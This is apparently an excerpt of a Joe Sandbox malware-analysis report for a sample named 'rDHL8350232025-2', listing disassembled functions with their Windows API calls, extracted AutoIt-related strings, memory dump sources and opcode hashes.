                                                                                      Function 0117BDE0 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction ID: 8080ae548c2520a77efd1c3141f686b779f0a2b3aef3133a14791d5c0cb59cae
                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction Fuzzy Hash: 5D01A478A05109EFCB48DF98C5909AEF7F5FF48310F208599D909A7301D730AE41DB84
                                                                                      Function 0117A7B0 Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                      Function 000B2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 000B2B43
                                                                                      • DestroyWindow.USER32 ref: 000B2B52
                                                                                      • GetDesktopWindow.USER32 ref: 000B2B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000B2CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000B2CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B2D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000B2D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000B2D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000B2DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,00000000), ref: 000B2DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000B2DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000B2E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000B2E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                      • Instruction ID: e50d27151ea63e1c06794060a67721acb4deccd484197104a7db99f0f8b360f1
                                                                                      • Opcode Fuzzy Hash: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                                                                      • Instruction Fuzzy Hash: AA025C71900209EFEB14DF64CD89EAE7BB9FF49314F148158F919AB2A1CB74AD41CB60
                                                                                      Function 000C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C7160
                                                                                      • GetSysColor.USER32(0000000F), ref: 000C716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 000C7186
                                                                                      • SelectObject.GDI32(?,?), ref: 000C7195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C71C0
                                                                                      • GetSysColor.USER32(00000010), ref: 000C71C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 000C71CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 000C71DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 000C71E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 000C7230
                                                                                      • FillRect.USER32(?,?,?), ref: 000C7262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C7284
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000012), ref: 000C7421
                                                                                        • Part of subcall function 000C73E8: SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                        • Part of subcall function 000C73E8: GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                        • Part of subcall function 000C73E8: GetSysColor.USER32(00000011), ref: 000C7463
                                                                                        • Part of subcall function 000C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                        • Part of subcall function 000C73E8: SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                        • Part of subcall function 000C73E8: SelectObject.GDI32(?,?), ref: 000C7498
                                                                                        • Part of subcall function 000C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                        • Part of subcall function 000C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                        • Part of subcall function 000C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: ae0bb80c710feba4bf123bc65ff0a066c80da1b12f7d6f9c70277700a550cbc8
                                                                                      • Instruction ID: 72a56fa44a5af90ef38c3fd14f52cd8f3825bc62f417626113e36e6e2604d048
                                                                                      • Opcode Fuzzy Hash: ae0bb80c710feba4bf123bc65ff0a066c80da1b12f7d6f9c70277700a550cbc8
                                                                                      • Instruction Fuzzy Hash: 19A19D72008701AFEB109F64DC48E6F7BE9FB89320F140A19F9AA961E1D778E944CF51
                                                                                      Function 00048D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00048E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00086AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00086AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00086F43
                                                                                        • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00086F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00086F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0$p]
                                                                                      • API String ID: 2760611726-498393191
                                                                                      • Opcode ID: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                      • Instruction ID: 08016a8475fab9aaf18e2b5fd2bd5019e1f5f69a35562e07aedb61c9b5f7cd68
                                                                                      • Opcode Fuzzy Hash: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                                                                      • Instruction Fuzzy Hash: 8712BC70600201EFDB65EF14C848FAAB7E1FB44304F158469F4C98B662CB36EC92CB55
                                                                                      Function 000B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 000B273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000B286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000B28A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000B28B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000B2900
                                                                                      • GetClientRect.USER32(00000000,?), ref: 000B290C
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000B2955
                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000B2964
                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2974
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000B2978
                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000B2988
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B2991
                                                                                      • DeleteDC.GDI32(00000000), ref: 000B299A
                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000B29C6
                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 000B29DD
                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000B2A1D
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000B2A31
                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 000B2A42
                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000B2A77
                                                                                      • GetStockObject.GDI32(00000011), ref: 000B2A82
                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000B2A8D
                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000B2A97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                      • API String ID: 2910397461-517079104
                                                                                      • Opcode ID: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                      • Instruction ID: 039f358524aa97314e5f24d19c7a8972b06eefe5678b96bca3595940f75304f1
                                                                                      • Opcode Fuzzy Hash: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                                                                      • Instruction Fuzzy Hash: F0B14D71A40215BFEB14DFA8CC49FAE7BA9FB08710F004114FA15EB691DBB4AD40CB94
                                                                                      Function 000A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 000A4AED
                                                                                      • GetDriveTypeW.KERNEL32(?,000CCB68,?,\\.\,000CCC08), ref: 000A4BCA
                                                                                      • SetErrorMode.KERNEL32(00000000,000CCB68,?,\\.\,000CCC08), ref: 000A4D36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: 47eb78f307da9595ec29458b92caa27bc72b498566f7b03778ff553efdf94413
                                                                                      • Instruction ID: 10aaf39bc2af0a52dc51ec76496237a865259de0f69f58e2db9fd165dcb0ac8f
                                                                                      • Opcode Fuzzy Hash: 47eb78f307da9595ec29458b92caa27bc72b498566f7b03778ff553efdf94413
                                                                                      • Instruction Fuzzy Hash: F8613738701209DBCB54DFA4C982DBC77B1EB86310B248015FA0AAFA52CBF6DD45EB51
                                                                                      Function 000C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 000C7421
                                                                                      • SetTextColor.GDI32(?,?), ref: 000C7425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 000C7446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 000C744B
                                                                                      • GetSysColor.USER32(00000011), ref: 000C7463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000C7482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000C748B
                                                                                      • SelectObject.GDI32(?,?), ref: 000C7498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000C7554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 000C7572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 000C757D
                                                                                      • GetSysColor.USER32(00000011), ref: 000C758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000C7596
                                                                                      • DrawTextW.USER32(?,000C70F5,000000FF,?,00000000), ref: 000C75A8
                                                                                      • SelectObject.GDI32(?,?), ref: 000C75BF
                                                                                      • DeleteObject.GDI32(?), ref: 000C75CA
                                                                                      • SelectObject.GDI32(?,?), ref: 000C75D0
                                                                                      • DeleteObject.GDI32(?), ref: 000C75D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 000C75DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 000C75E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      • Opcode ID: 5a8e3417a9d8b32627f38b513e75c026c46f8e540d25f70e61c8480306ab6341
                                                                                      • Instruction ID: 89af01db6535885ef6a9f1e38068d1232e0dfc0a84c58ae744231a97ce497f02
                                                                                      • Opcode Fuzzy Hash: 5a8e3417a9d8b32627f38b513e75c026c46f8e540d25f70e61c8480306ab6341
                                                                                      • Instruction Fuzzy Hash: 00615C72900218AFEF119FA4DC49EEEBFB9EB09320F154115FA19AB2A1D7749940CF90
                                                                                      Function 000C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 000C1128
                                                                                      • GetDesktopWindow.USER32 ref: 000C113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 000C1144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C1199
                                                                                      • DestroyWindow.USER32(?), ref: 000C11B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000C11ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 000C1232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 000C1245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 000C12A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 000C12BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 000C12D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C12E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 000C130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 000C1328
                                                                                      • CopyRect.USER32(?,?), ref: 000C133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 000C13AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      • Opcode ID: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                                                                      • Instruction ID: 583ff4e4d209f3c7b39da738ba360cc94d4f103e2d1c4e01fd9bffe855240aa2
                                                                                      • Opcode Fuzzy Hash: 4783d556c4735a6cd596822aac5b6f5db8ea4c01ce55ba74044ed1ef4784eb78
                                                                                      • Instruction Fuzzy Hash: E9B17971608341AFE754DF64C984FAEBBE4EF85354F00891CF9999B2A2C771E844CB92
                                                                                      Function 000C0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000C02E5
                                                                                      • _wcslen.LIBCMT ref: 000C031F
                                                                                      • _wcslen.LIBCMT ref: 000C0389
                                                                                      • _wcslen.LIBCMT ref: 000C03F1
                                                                                      • _wcslen.LIBCMT ref: 000C0475
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000C04C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C0504
                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                        • Part of subcall function 0009223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00092258
                                                                                        • Part of subcall function 0009223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0009228A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 1103490817-719923060
                                                                                      • Opcode ID: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                                                                      • Instruction ID: f6c12ee4ae517cdf41a5cddee91d79002ff1185d3080e4df25c9649689fa57b7
                                                                                      • Opcode Fuzzy Hash: 34ff098c18a4279891e6849fd297310360746085db5f4c847ad64f49d454ff59
                                                                                      • Instruction Fuzzy Hash: 6EE19D71208601DBCB24DF24C551E7EB3E5BF88314F54496CF99A9B6A2DB30ED45CB82
                                                                                      Function 00048891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00048968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00048970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0004899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000489A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000489C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000489E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000489F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00048A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00048A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00048A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 00048A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00048A81
                                                                                        • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                                                                        • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
